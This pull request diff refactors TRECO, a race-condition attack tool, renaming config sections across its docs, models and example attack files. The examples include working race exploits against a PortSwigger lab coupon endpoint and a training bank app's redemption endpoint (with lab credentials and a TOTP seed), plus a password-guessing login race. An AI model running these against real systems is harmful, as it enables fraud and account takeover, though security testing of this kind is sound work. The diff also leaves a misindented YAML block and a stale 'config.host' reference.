### PR TITLE
refactor!: rename config to target and simplify entrypoints to single entrypoint

### DIFF
--- a/ADVANCED_FEATURES.md
+++ b/ADVANCED_FEATURES.md
@@ -172,9 +172,9 @@ config:
       username: "{{ env('CORP_USER') }}"
       password: "{{ env('CORP_PASS') }}"
 
-entrypoints:
-  - state: test
-    input: {}
+entrypoint:
+  state: test
+  input: {}
 
 states:
   test:
@@ -908,11 +908,11 @@ config:
       username: "{{ env('PROXY_USER') }}"
       password: "{{ env('PROXY_PASS') }}"
 
-entrypoints:
-  - state: authenticate
-    input:
-      username: "{{ argv('user', 'testuser') }}"
-      password: "{{ argv('pass', 'testpass') }}"
+entrypoint:
+  state: authenticate
+  input:
+    username: "{{ argv('user', 'testuser') }}"
+    password: "{{ argv('pass', 'testpass') }}"
 
 states:
   authenticate:

--- a/README.md
+++ b/README.md
@@ -203,9 +203,9 @@ config:
   tls:
     enabled: true
 
-entrypoints:
-  - state: test
-    input: {}
+entrypoint:
+  state: test
+  input: {}
 
 states:
   test:
@@ -252,11 +252,11 @@ config:
     enabled: true
     verify_cert: true
 
-entrypoints:
-  - state: login
-    input:
-      username: "testuser"
-      password: "testpass"
+entrypoint:
+  state: login
+  input:
+    username: "testuser"
+    password: "testpass"
 
 states:
   login:
@@ -522,10 +522,10 @@ config:
       username: string      # Proxy username
       password: string      # Proxy password
 
-entrypoints:
-  - state: string           # Starting state name
-    input:                  # Initial variables (key-value pairs)
-      key: value
+entrypoint:
+  state: string           # Starting state name
+  input:                  # Initial variables (key-value pairs)
+    key: value
 
 states:
   state_name:
@@ -994,11 +994,11 @@ config:
   tls:
     enabled: true
 
-entrypoints:
-  - state: get_token
-    input:
-      card_number: "4111111111111111"
-      amount: 1000
+entrypoint:
+  state: get_token
+  input:
+    card_number: "4111111111111111"
+    amount: 1000
 
 states:
   get_token:
@@ -1067,11 +1067,11 @@ config:
   tls:
     enabled: true
 
-entrypoints:
-  - state: login
-    input:
-      username: "{{ argv('user', 'testuser') }}"
-      password: "{{ argv('pass', 'testpass') }}"
+entrypoint:
+  state: login
+  input:
+    username: "{{ argv('user', 'testuser') }}"
+    password: "{{ argv('pass', 'testpass') }}"
 
 states:
   login:
@@ -1165,12 +1165,12 @@ config:
   tls:
     enabled: true
 
-entrypoints:
-  - state: login
-    input:
-      username: "{{ argv('user') }}"
-      password: "{{ argv('pass') }}"
-      totp_seed: "{{ env('TOTP_SEED') }}"
+entrypoint:
+  state: login
+  input:
+    username: "{{ argv('user') }}"
+    password: "{{ argv('pass') }}"
+    totp_seed: "{{ env('TOTP_SEED') }}"
 
 states:
   login:
@@ -1235,10 +1235,10 @@ config:
   tls:
     enabled: true
 
-entrypoints:
-  - state: authenticate
-    input:
-      api_key: "{{ env('API_KEY') }}"
+entrypoint:
+  state: authenticate
+  input:
+    api_key: "{{ env('API_KEY') }}"
 
 states:
   authenticate:

--- a/docs/source/api.rst
+++ b/docs/source/api.rst
@@ -102,8 +102,8 @@ Root configuration object.
    @dataclass
    class Config:
        metadata: Metadata
-       config: ServerConfig
-       entrypoints: List[Entrypoint]
+       target: TargetConfig
+       entrypoint: Entrypoint
        states: Dict[str, State]
 
 ServerConfig

--- a/docs/source/cli.rst
+++ b/docs/source/cli.rst
@@ -132,12 +132,12 @@ Reference in YAML:
 
 .. code-block:: yaml
 
-   entrypoints:
-     - state: login
-       input:
-         username: "{{ env('USERNAME') }}"
-         password: "{{ env('PASSWORD') }}"
-         api_key: "{{ env('API_KEY', 'default_key') }}"
+   entrypoint:
+     state: login
+      input:
+      username: "{{ env('USERNAME') }}"
+      password: "{{ env('PASSWORD') }}"
+      api_key: "{{ env('API_KEY', 'default_key') }}"
 
 Complete Examples
 -----------------

--- a/docs/source/configuration.rst
+++ b/docs/source/configuration.rst
@@ -12,7 +12,7 @@ A complete TRECO configuration file consists of four main sections:
 
    metadata:      # Attack metadata
    config:        # Server and execution settings
-   entrypoints:   # Starting points
+   entrypoint:    # Starting point
    states:        # State definitions
 
 Metadata Section
@@ -101,19 +101,19 @@ The ``config`` section defines server and execution settings.
      - false
      - Verify SSL/TLS certificates
 
-Entrypoints Section
+Entrypoint Section
 -------------------
 
-The ``entrypoints`` section defines starting points for execution.
+The ``entrypoint`` section defines starting point for execution.
 
 .. code-block:: yaml
 
-   entrypoints:
-     - state: login
-       input:
-         username: "testuser"
-         password: "testpass"
-         api_key: "{{ env('API_KEY') }}"
+   entrypoint:
+     state: login
+     input:
+       username: "testuser"
+       password: "testpass"
+       api_key: "{{ env('API_KEY') }}"
 
 **Fields:**
 
@@ -387,11 +387,11 @@ Here's a complete configuration example:
        enabled: true
        verify_cert: true
 
-   entrypoints:
-     - state: login
-       input:
-         username: "{{ argv('user', 'testuser') }}"
-         password: "{{ env('PASSWORD', 'testpass') }}"
+   entrypoint:
+     state: login
+     input:
+       username: "{{ argv('user', 'testuser') }}"
+       password: "{{ env('PASSWORD', 'testpass') }}"
 
    states:
      login:

--- a/docs/source/contributing.rst
+++ b/docs/source/contributing.rst
@@ -12,7 +12,7 @@ A complete TRECO configuration file consists of four main sections:
 
    metadata:      # Attack metadata
    config:        # Server and execution settings
-   entrypoints:   # Starting points
+   entrypoint:    # Starting point
    states:        # State definitions
 
 Metadata Section
@@ -362,19 +362,19 @@ Here's a complete configuration with all options:
          username: "{{ env('PROXY_USER') }}"
          password: "{{ env('PROXY_PASS') }}"
 
-Entrypoints Section
+Entrypoint Section
 -------------------
 
-The ``entrypoints`` section defines starting points for execution.
+The ``entrypoint`` section defines starting points for execution.
 
 .. code-block:: yaml
 
-   entrypoints:
-     - state: login
-       input:
-         username: "{{ argv('user', 'testuser') }}"
-         password: "{{ env('PASSWORD') }}"
-         api_key: "{{ env('API_KEY') }}"
+   entrypoint:
+     state: login
+     input:
+       username: "{{ argv('user', 'testuser') }}"
+       password: "{{ env('PASSWORD') }}"
+       api_key: "{{ env('API_KEY') }}"
 
 **Fields:**
 
@@ -391,25 +391,6 @@ The ``entrypoints`` section defines starting points for execution.
    * - ``input``
      - No
      - Initial variables (supports templates)
-
-**Multiple Entrypoints**
-
-You can define multiple entrypoints to run different attack scenarios:
-
-.. code-block:: yaml
-
-   entrypoints:
-     - state: test_user_flow
-       input:
-         username: "user1"
-     
-     - state: test_admin_flow
-       input:
-         username: "admin"
-         elevated: true
-
-.. note::
-   Currently, TRECO executes only the first entrypoint. Multiple entrypoints are reserved for future functionality.
 
 States Section
 --------------
@@ -819,11 +800,11 @@ Here's a complete configuration example with all features:
          username: "{{ env('PROXY_USER') }}"
          password: "{{ env('PROXY_PASS') }}"
 
-   entrypoints:
-     - state: login
-       input:
-         username: "{{ argv('user', 'testuser') }}"
-         password: "{{ env('PASSWORD', 'testpass') }}"
+   entrypoint:
+     state: login
+     input:
+       username: "{{ argv('user', 'testuser') }}"
+       password: "{{ env('PASSWORD', 'testpass') }}"
 
    states:
      login:

--- a/docs/source/examples.rst
+++ b/docs/source/examples.rst
@@ -23,11 +23,11 @@ Test if a payment can be processed multiple times.
        enabled: true
        verify_cert: true
 
-   entrypoints:
-     - state: login
-       input:
-         username: "{{ env('USERNAME') }}"
-         password: "{{ env('PASSWORD') }}"
+   entrypoint:
+     state: login
+     input:
+       username: "{{ env('USERNAME') }}"
+       password: "{{ env('PASSWORD') }}"
 
    states:
      login:
@@ -147,12 +147,12 @@ Test if a single-use coupon can be redeemed multiple times.
      tls:
        enabled: true
 
-   entrypoints:
-     - state: login
-       input:
-         username: "{{ argv('user', 'testuser') }}"
-         password: "{{ env('PASSWORD') }}"
-         coupon_code: "{{ argv('coupon', 'SAVE50') }}"
+   entrypoint:
+     state: login
+     input:
+       username: "{{ argv('user', 'testuser') }}"
+       password: "{{ env('PASSWORD') }}"
+       coupon_code: "{{ argv('coupon', 'SAVE50') }}"
 
    states:
      login:
@@ -264,12 +264,12 @@ Test if limited inventory items can be over-purchased.
      tls:
        enabled: true
 
-   entrypoints:
-     - state: login
-       input:
-         username: "{{ env('USERNAME') }}"
-         password: "{{ env('PASSWORD') }}"
-         product_id: "{{ argv('product', 'LIMITED-001') }}"
+   entrypoint:
+     state: login
+     input:
+       username: "{{ env('USERNAME') }}"
+       password: "{{ env('PASSWORD') }}"
+       product_id: "{{ argv('product', 'LIMITED-001') }}"
 
    states:
      login:
@@ -402,16 +402,16 @@ Test if rate limiting can be bypassed through concurrent requests.
      tls:
        enabled: true
 
-   entrypoints:
-     - state: race_login
-       input:
-         username: "{{ argv('user', 'admin') }}"
-         passwords:
-           - "password123"
-           - "admin123"
-           - "letmein"
-           - "qwerty"
-           - "12345678"
+   entrypoint:
+     state: race_login
+     input:
+       username: "{{ argv('user', 'admin') }}"
+       passwords:
+         - "password123"
+         - "admin123"
+         - "letmein"
+         - "qwerty"
+         - "12345678"
 
    states:
      race_login:
@@ -479,12 +479,12 @@ Test authentication with TOTP-based 2FA.
      tls:
        enabled: true
 
-   entrypoints:
-     - state: login
-       input:
-         username: "{{ env('USERNAME') }}"
-         password: "{{ env('PASSWORD') }}"
-         totp_seed: "{{ env('TOTP_SEED') }}"
+   entrypoint:
+     state: login
+     input:
+       username: "{{ env('USERNAME') }}"
+       password: "{{ env('PASSWORD') }}"
+       totp_seed: "{{ env('TOTP_SEED') }}"
 
    states:
      login:
@@ -588,11 +588,11 @@ Complete flow with CSRF token extraction.
      tls:
        enabled: true
 
-   entrypoints:
-     - state: get_login_page
-       input:
-         username: "{{ env('USERNAME') }}"
-         password: "{{ env('PASSWORD') }}"
+   entrypoint:
+     state: get_login_page
+     input:
+       username: "{{ env('USERNAME') }}"
+       password: "{{ env('PASSWORD') }}"
 
    states:
      get_login_page:

--- a/docs/source/index.rst
+++ b/docs/source/index.rst
@@ -228,11 +228,11 @@ Here's a simple example of a race condition test for a fund redemption vulnerabi
      tls:
        enabled: true
 
-   entrypoints:
-     - state: login
-       input:
-         username: "testuser"
-         password: "testpass"
+   entrypoint:
+     state: login
+     input:
+       username: "testuser"
+       password: "testpass"
 
    states:
      login:
@@ -419,7 +419,7 @@ Execution Flow
 ~~~~~~~~~~~~~~
 
 1. **Configuration Loading**: Parse YAML attack definition and validate structure
-2. **State Initialization**: Set up initial state with variables from entrypoints
+2. **State Initialization**: Set up initial state with variables from entrypoint
 3. **State Execution**: Execute states sequentially according to transition rules
 4. **Race Coordination**: Synchronize threads for race attacks using selected mechanism
 5. **Request Dispatch**: Send HTTP requests simultaneously for optimal timing

--- a/docs/source/quickstart.rst
+++ b/docs/source/quickstart.rst
@@ -28,11 +28,11 @@ Create a file called ``attack.yaml``:
        enabled: true
        verify_cert: true
 
-   entrypoints:
-     - state: login
-       input:
-         username: "testuser"
-         password: "testpass"
+   entrypoint:
+     state: login
+     input:
+       username: "testuser"
+       password: "testpass"
 
    states:
      login:
@@ -223,11 +223,11 @@ Basic Authentication Test
      tls:
        enabled: false
 
-   entrypoints:
-     - state: race_login
-       input:
-         username: "admin"
-         password: "password123"
+   entrypoint:
+     state: race_login
+     input:
+       username: "admin"
+       password: "password123"
 
    states:
      race_login:
@@ -268,11 +268,11 @@ API with TOTP 2FA
      tls:
        enabled: true
 
-   entrypoints:
-     - state: login
-       input:
-         username: "{{ argv('user', 'testuser') }}"
-         totp_seed: "{{ argv('seed', 'JBSWY3DPEHPK3PXP') }}"
+   entrypoint:
+     state: login
+     input:
+       username: "{{ argv('user', 'testuser') }}"
+       totp_seed: "{{ argv('seed', 'JBSWY3DPEHPK3PXP') }}"
 
    states:
      login:

--- a/docs/source/templates.rst
+++ b/docs/source/templates.rst
@@ -174,12 +174,12 @@ Access environment variables with optional default values.
 
 .. code-block:: yaml
 
-   entrypoints:
-     - state: login
-       input:
-         username: "{{ env('USERNAME', 'testuser') }}"
-         password: "{{ env('PASSWORD') }}"
-         api_key: "{{ env('API_KEY', 'demo_key') }}"
+   entrypoint:
+     state: login
+     input:
+       username: "{{ env('USERNAME', 'testuser') }}"
+       password: "{{ env('PASSWORD') }}"
+       api_key: "{{ env('API_KEY', 'demo_key') }}"
 
 CLI Arguments (argv)
 ~~~~~~~~~~~~~~~~~~~~
@@ -199,11 +199,11 @@ Access command-line arguments passed to TRECO.
 .. code-block:: yaml
 
    # In YAML
-   entrypoints:
-     - state: login
-       input:
-         username: "{{ argv('user', 'testuser') }}"
-         thread_count: "{{ argv('threads', '10') }}"
+   entrypoint:
+     state: login
+     input:
+       username: "{{ argv('user', 'testuser') }}"
+       thread_count: "{{ argv('threads', '10') }}"
    
    # Run with:
    # treco attack.yaml --user alice --threads 20

--- a/docs/source/troubleshooting.rst
+++ b/docs/source/troubleshooting.rst
@@ -1087,8 +1087,8 @@ Create minimal config that reproduces the issue:
      tls:
        enabled: true
    
-   entrypoints:
-     - state: test
+   entrypoint:
+     state: test
    
    states:
      test:

--- a/examples/portswigger/limit-overrrun/attack.yaml
+++ b/examples/portswigger/limit-overrrun/attack.yaml
@@ -23,7 +23,7 @@ metadata:
     Exploits race condition in POST /cart/coupon to apply 20% discount 
     multiple times, bypassing single-use validation.
 
-config:
+target:
   host: "{{ env('LAB_HOST', '0a1b2c3d4e5f.web-security-academy.net') }}"
   port: 443
   tls:
@@ -32,13 +32,13 @@ config:
   http:
     follow_redirects: false
 
-entrypoints:
-  - state: get_login_page
-    input:
-      username: "wiener"
-      password: "peter"
-      coupon_code: "PROMO20"
-      product_id: "1"
+entrypoint:
+  state: get_login_page
+  input:
+    username: "wiener"
+    password: "peter"
+    coupon_code: "PROMO20"
+    product_id: "1"
 
 # ============================================================================
 # STATES
@@ -54,7 +54,7 @@ states:
     description: "Get CSRF token from login page"
     request: |
       GET /login HTTP/1.1
-      Host: {{ config.host }}
+      Host: {{ target.host }}
 
     extract:
       csrf:
@@ -70,7 +70,7 @@ states:
         ╔═══════════════════════════════════════════════════════════════════════╗
         ║  🦎 PortSwigger - Limit Overrun Race Condition                        ║
         ╠═══════════════════════════════════════════════════════════════════════╣
-        ║  🎯 Target: {{ "%-57s" | format(config.host)                       }} ║
+        ║  🎯 Target: {{ "%-57s" | format(target.host)                       }} ║
         ║  🎟️  Coupon: {{ "%-57s" | format(coupon_code)                      }} ║
         ╚═══════════════════════════════════════════════════════════════════════╝
 
@@ -82,7 +82,7 @@ states:
     description: "Authenticate with credentials"
     request: |
       POST /login HTTP/1.1
-      Host: {{ config.host }}
+      Host: {{ target.host }}
       Content-Type: application/x-www-form-urlencoded
       Cookie: session={{ get_login_page.session }}
       
@@ -119,7 +119,7 @@ states:
     description: "Add Leather Jacket to cart"
     request: |
       POST /cart HTTP/1.1
-      Host: {{ config.host }}
+      Host: {{ target.host }}
       Content-Type: application/x-www-form-urlencoded
       Cookie: session={{ login.session }}
       
@@ -137,7 +137,7 @@ states:
     description: "Check cart before attack"
     request: |
       GET /cart HTTP/1.1
-      Host: {{ config.host }}
+      Host: {{ target.host }}
       Cookie: session={{ login.session }}
 
     extract:
@@ -167,14 +167,14 @@ states:
     description: "Race condition - apply coupon multiple times"
     request: |
       POST /cart/coupon HTTP/1.1
-      Host: {{ config.host }}
+      Host: {{ target.host }}
       Content-Type: application/x-www-form-urlencoded
       Cookie: session={{ login.session }}
       
       csrf={{ view_cart_before.csrf }}&coupon={{ coupon_code }}
 
     race:
-      threads: 20
+      threads: 2
       sync_mechanism: barrier
       connection_strategy: multiplexed
       thread_propagation: single
@@ -212,7 +212,7 @@ states:
     description: "Check cart after attack"
     request: |
       GET /cart HTTP/1.1
-      Host: {{ config.host }}
+      Host: {{ target.host }}
       Cookie: session={{ login.session }}
 
     extract:
@@ -249,7 +249,7 @@ states:
     description: "Complete purchase"
     request: |
       POST /cart/checkout HTTP/1.1
-      Host: {{ config.host }}
+      Host: {{ target.host }}
       Content-Type: application/x-www-form-urlencoded
       Cookie: session={{ login.session }}
       

--- a/examples/racing-bank/fund-redemption-attack.yaml
+++ b/examples/racing-bank/fund-redemption-attack.yaml
@@ -22,23 +22,27 @@ metadata:
     Server fails to properly synchronize redemption operations, allowing
     multiple redemptions of the same investment - money multiplication.
 
-config:
-  host: "bankao-api.hacknroll.academy"
-  port: 443
+target:
+  host: "bankao-api.local"
+  port: 80
   threads: 20
   reuse_connection: false
   tls:
-    enabled: true
-    verify_cert: true
+    enabled: false
+    verify_cert: false
+  # proxy:
+  #   type: http
+  #   host: 127.0.0.1
+  #   port: 8080
 
-entrypoints:
-  - state: auth_login
-    input:
-      username: "crash"
-      password: "bhack123"
-      totp_seed: "OZDIJJEHAXPAGSBXPG5TLGDIZKFR7YNT"
-      subscribe_amount: 200
-      redeem_amount: 20
+entrypoint:
+  state: auth_login
+  input:
+    username: "crash"
+    password: "bhack123"
+    totp_seed: "OZDIJJEHAXPAGSBXPG5TLGDIZKFR7YNT"
+    subscribe_amount: 200
+    redeem_amount: 20
 
 # ============================================================================
 # STATES
@@ -54,7 +58,7 @@ states:
     description: "Login with credentials"
     request: |
       POST /login HTTP/1.1
-      Host: {{ config.host }}
+      Host: {{ target.host }}
       Content-Type: application/json
       
       {"username": "{{ username }}", "password": "{{ password }}"}
@@ -67,12 +71,12 @@ states:
     logger:
       on_state_enter: |
 
-        ╔══════════════════════════════════════════════════════════════╗
-        ║  🦎 TRECO - Fund Redemption Race Attack                      ║
-        ╠══════════════════════════════════════════════════════════════╣
-        ║  🎯 Target: {{ config.host }}
-        ║  👤 User:   {{ username }}
-        ╚══════════════════════════════════════════════════════════════╝
+        ╔═════════════════════════════════════════════════════════════════════╗
+        ║  🦎 TRECO - Fund Redemption Race Attack                             ║
+        ╠═════════════════════════════════════════════════════════════════════╣
+        ║  🎯 Target: {{ "%-55s" | format(target.host)                     }} ║
+        ║  👤 User:   {{ "%-55s" | format(username)                        }} ║
+        ╚═════════════════════════════════════════════════════════════════════╝
 
       on_state_leave: |
         🔐 Login successful → temp token received
@@ -87,7 +91,7 @@ states:
     description: "TOTP verification"
     request: |
       POST /2fa HTTP/1.1
-      Host: {{ config.host }}
+      Host: {{ target.host }}
       Content-Type: application/json
       Authorization: Bearer {{ auth_login.temp_token }}
       
@@ -124,7 +128,7 @@ states:
     description: "Get initial balance"
     request: |
       GET /balance HTTP/1.1
-      Host: {{ config.host }}
+      Host: {{ target.host }}
       Authorization: Bearer {{ auth_2fa.token }}
 
     extract:
@@ -141,13 +145,29 @@ states:
 
     next:
       - on_status: 200
+        goto: redemption
+
+  redemption:
+    description: "Redeem shared"
+    request: |
+      POST /redemption HTTP/1.1
+      Host: {{ target.host }}
+      Content-Type: application/json
+      Authorization: Bearer {{ auth_2fa.token }}
+      
+      {"amount": 2000}
+
+    next:
+      - on_status: 200
+        goto: subscribe_fund
+      - on_status: 400
         goto: subscribe_fund
 
   subscribe_fund:
     description: "Subscribe to fund"
     request: |
       POST /subscribe HTTP/1.1
-      Host: {{ config.host }}
+      Host: {{ target.host }}
       Content-Type: application/json
       Authorization: Bearer {{ auth_2fa.token }}
       
@@ -176,17 +196,19 @@ states:
   race_redemption:
     description: "Race condition - redeem same shares multiple times"
     request: |
-      POST /redemption HTTP/1.1
-      Host: {{ config.host }}
+      POST /redemption HTTP/2
+      Host: {{ target.host }}
       Content-Type: application/json
       Authorization: Bearer {{ auth_2fa.token }}
       
-      {"amount": {{ redeem_amount }}}
+      {
+        "amount": {{ redeem_amount }}
+      }
 
     race:
-      threads: 5
+      threads: 2
       sync_mechanism: barrier
-      connection_strategy: preconnect
+      connection_strategy: multiplexed
       thread_propagation: single
 
     extract:
@@ -203,14 +225,14 @@ states:
     logger:
       on_state_enter: |
 
-        ┌──────────────────────────────────────────────────────────────┐
-        │  ⚡ RACE ATTACK                                              │
-        ├──────────────────────────────────────────────────────────────┤
-        │  🔗 Endpoint:  POST /redemption                              │
-        │  🧵 Threads:   20                                            │
-        │  🔧 Strategy:  preconnect + barrier                          │
-        │  💵 Amount:    {{ redeem_amount }} shares each                          │
-        └──────────────────────────────────────────────────────────────┘
+        ┌──────────────────────────────────────────────────────────────────────────────┐
+        │  ⚡ RACE ATTACK                                                              │
+        ├──────────────────────────────────────────────────────────────────────────────┤
+        │  🔗 Endpoint:  POST /redemption                                              │
+        │  🧵 Threads:   20                                                            │
+        │  🔧 Strategy:  preconnect + barrier                                          │
+        │  💵 Shares:    {{ "%-61s" | format(redeem_amount)                         }} │
+        └──────────────────────────────────────────────────────────────────────────────┘
 
       on_thread_leave: |
         {% if response.status_code == 200 %}
@@ -239,7 +261,7 @@ states:
     description: "Get final balance"
     request: |
       GET /balance HTTP/1.1
-      Host: {{ config.host }}
+      Host: {{ target.host }}
       Authorization: Bearer {{ auth_2fa.token }}
 
     extract:
@@ -256,28 +278,28 @@ states:
         {% set final = get_final_balance.cash | float %}
         {% set diff = final - initial %}
 
-        ┌──────────────────────────────────────────────────────────────┐
-        │  📊 RESULTS                                                  │
-        ├──────────────────────────────────────────────────────────────┤
-        │  💵 Initial Cash:    ${{ get_initial_balance.cash }}
-        │  💵 Final Cash:      ${{ get_final_balance.cash }}
-        │  📈 Initial Shares:  {{ get_initial_balance.shares }}
-        │  📈 Final Shares:    {{ get_final_balance.shares }}
-        ├──────────────────────────────────────────────────────────────┤
-        │  📉 Subscribed:      ${{ subscribe_amount }}
-        │  💰 Net Change:      ${{ diff }}
+        ┌──────────────────────────────────────────────────────────────────────────────┐
+        │  📊 RESULTS                                                                  │
+        ├──────────────────────────────────────────────────────────────────────────────┤
+        │  💵 Initial Cash:    ${{ "%-54s" | format(get_initial_balance.cash)       }} │
+        │  💵 Final Cash:      ${{ "%-54s" | format(get_final_balance.cash)         }} │
+        │  📈 Initial Shares:   {{ "%-54s" | format(get_initial_balance.shares)     }} │
+        │  📈 Final Shares:     {{ "%-54s" | format(get_final_balance.shares)       }} │
+        ├──────────────────────────────────────────────────────────────────────────────┤
+        │  📉 Subscribed:      ${{ "%-54s" | format(subscribe_amount)               }} │
+        │  💰 Net Change:      ${{ "%-54s" | format(diff)                           }} │
         {% if diff > 0 %}
-        ├──────────────────────────────────────────────────────────────┤
-        │  🎉 VULNERABLE - Money multiplied!                           │
-        │  💸 Profit: ${{ diff }}
+        ├──────────────────────────────────────────────────────────────────────────────┤
+        │  🎉 VULNERABLE - Money multiplied!                                           │
+        │  💸 Profit: ${{ "%-64s" | format(diff)                                    }} │
         {% elif diff == 0 %}
-        ├──────────────────────────────────────────────────────────────┤
-        │  ⚠️  Break even - partial exploitation?                      │
+        ├──────────────────────────────────────────────────────────────────────────────┤
+        │  ⚠️  Break even - partial exploitation?                                      │
         {% else %}
-        ├──────────────────────────────────────────────────────────────┤
-        │  ✅ PROTECTED - No race condition                            │
+        ├──────────────────────────────────────────────────────────────────────────────┤
+        │  ✅ PROTECTED - No race condition                                            │
         {% endif %}
-        └──────────────────────────────────────────────────────────────┘
+        └──────────────────────────────────────────────────────────────────────────────┘
 
     next:
       - goto: end

--- a/examples/test.yaml
+++ b/examples/test.yaml
@@ -1,0 +1,48 @@
+metadata:
+  name: "Race Condition Test"
+  version: "1.0"
+  author: "Security Researcher"
+  vulnerability: "CWE-362"
+
+target:
+  host: "api.example.com"
+  port: 443
+  threads: 20
+  reuse_connection: false
+  tls:
+    enabled: true
+    verify_cert: true
+
+entrypoint:
+  state: login
+  input:
+    username: "testuser"
+    password: "testpass"
+    api_key: "{{ env('API_KEY') }}"
+
+states:
+  login:
+    description: "Authenticate and get token"
+    request: |
+      POST /api/login HTTP/1.1
+      Host: {{ config.host }}
+      Content-Type: application/json
+
+      {"username": "{{ username }}", "password": "{{ password }}"}
+
+    extract:
+      token:
+        type: jpath
+        pattern: "$.access_token"
+
+    next:
+      - on_status: 200
+        goto: end
+      - on_status: 401
+        goto: error
+
+  end:
+    description: "Successful login state"
+
+  error:
+    description: "Error state for failed login attempts"

--- a/src/treco/http/client.py
+++ b/src/treco/http/client.py
@@ -11,7 +11,7 @@ import logging
 
 logger = logging.getLogger(__name__)
 
-from treco.models import ServerConfig
+from treco.models import TargetConfig
 from treco.http.parser import HTTPParser
 
 
@@ -40,7 +40,7 @@ class HTTPClient:
         print(response.status_code)  # 200
     """
 
-    def __init__(self, config: ServerConfig, http2: bool = False):
+    def __init__(self, target: TargetConfig, http2: bool = False):
         """
         Initialize HTTP client with server configuration.
 
@@ -48,13 +48,13 @@ class HTTPClient:
             config: Server configuration (host, port, TLS settings)
             http2: Whether to use HTTP/2 (default: False for compatibility)
         """
-        self.config = config
+        self.config = target
         self.parser = HTTPParser()
         self._http2 = http2
 
         # Build base URL
-        scheme = "https" if config.tls.enabled else "http"
-        self.base_url = f"{scheme}://{config.host}:{config.port}"
+        scheme = "https" if target.tls.enabled else "http"
+        self.base_url = f"{scheme}://{target.host}:{target.port}"
 
         # Create client with connection pooling
         self.client = self._create_client()

--- a/src/treco/models/__init__.py
+++ b/src/treco/models/__init__.py
@@ -8,7 +8,7 @@ and runtime execution state.
 from .config import (
     Metadata,
     TLSConfig,
-    ServerConfig,
+    TargetConfig,
     Entrypoint,
     Transition,
     RaceConfig,
@@ -21,7 +21,7 @@ from .context import ExecutionContext
 __all__ = [
     "Metadata",
     "TLSConfig",
-    "ServerConfig",
+    "TargetConfig",
     "Entrypoint",
     "Transition",
     "RaceConfig",

--- a/src/treco/models/config.py
+++ b/src/treco/models/config.py
@@ -5,12 +5,17 @@ These classes represent the structure of the YAML configuration file,
 providing type safety and validation.
 """
 
+from abc import ABC
 from dataclasses import dataclass, field
 from typing import Optional, Dict, List, Any
 
+@dataclass
+class BaseConfig(ABC):
+    """Base configuration class."""
+    pass
 
 @dataclass
-class Metadata:
+class Metadata(BaseConfig):
     """
     Metadata about the attack scenario.
 
@@ -26,9 +31,8 @@ class Metadata:
     author: str
     vulnerability: str
 
-
 @dataclass
-class TLSConfig:
+class TLSConfig(BaseConfig):
     """
     TLS/SSL configuration.
 
@@ -50,6 +54,7 @@ class HTTPConfig:
     """
 
     follow_redirects: bool = True
+    timeout: int = 10  # in seconds
 
 @dataclass
 class ProxyAuth:
@@ -93,7 +98,7 @@ class ProxyConfig:
         return proxy_url
 
 @dataclass
-class ServerConfig:
+class TargetConfig(BaseConfig):
     """
     Target server configuration.
 
@@ -116,7 +121,7 @@ class ServerConfig:
 
 
 @dataclass
-class Entrypoint:
+class Entrypoint(BaseConfig):
     """
     Defines the initial state and variables for execution.
 
@@ -230,21 +235,21 @@ class State:
 
 
 @dataclass
-class Config:
+class Config(BaseConfig):
     """
     Root configuration object representing the entire YAML file.
 
     This is the top-level structure that contains all attack configuration,
-    including metadata, server settings, states, and entrypoints.
+    including metadata, server settings, states, and entrypoint.
 
     Attributes:
         metadata: Attack metadata (name, version, author, vulnerability)
         config: Server and execution configuration
-        entrypoints: List of possible entry points (usually just one)
+        entrypoint: Initial state and input variables
         states: Dictionary mapping state names to State objects
     """
 
     metadata: Metadata
-    config: ServerConfig
-    entrypoints: List[Entrypoint]
+    target: TargetConfig
+    entrypoint: Entrypoint
     states: Dict[str, State]

--- a/src/treco/state/executor.py
+++ b/src/treco/state/executor.py
@@ -124,7 +124,7 @@ class StateExecutor:
         try:
             # Render HTTP request template
             context_input = context.to_dict()
-            context_input["config"] = self.http_client.config
+            context_input["target"] = self.http_client.config
             http_text = self.template_engine.render(state.request, context_input, context)
 
             # Send HTTP request

--- a/src/treco/state/machine.py
+++ b/src/treco/state/machine.py
@@ -66,7 +66,7 @@ class StateMachine:
             ValueError: If state not found or invalid transition
         """
         # Initialize entrypoint variables
-        entrypoint = self.config.entrypoints[0]
+        entrypoint = self.config.entrypoint
         self._initialize_variables(entrypoint.input)
 
         # Start from entrypoint state
@@ -86,7 +86,7 @@ class StateMachine:
             self.history.append(state_name)
 
             context_input = self.context.to_dict()
-            context_input["config"] = self.config.config
+            context_input["target"] = self.config.target
 
             state_description: str = self.engine.render(
                 state.description,
@@ -96,10 +96,12 @@ class StateMachine:
 
             logger.info(f"\n[StateMachine] Executing state: {state_name}")
             logger.info(f"[StateMachine] Description: {state_description}")
-
+            
             if state.logger.on_state_enter:
+                
                 context_input = self.context.to_dict()
-                context_input["config"] = self.config.config
+                context_input["target"] = self.config.target
+                
 
                 logger_output = self.engine.render(
                     state.logger.on_state_enter,
@@ -118,7 +120,7 @@ class StateMachine:
 
             if state.logger.on_state_leave:
                 context_input = self.context.to_dict()
-                context_input["config"] = self.config.config
+                context_input["target"] = self.config.target
                 context_input["response"] = asdict(result)
 
                 logger_output = self.engine.render(


### PR DESCRIPTION
- Rename  section to  for clarity
- Change  (list) to help not implemented (single object)
- Rename  to
- Refactor CLI to use click with --set flag for variables
- Add support for nested config overrides via dot notation
- Update all examples and documentation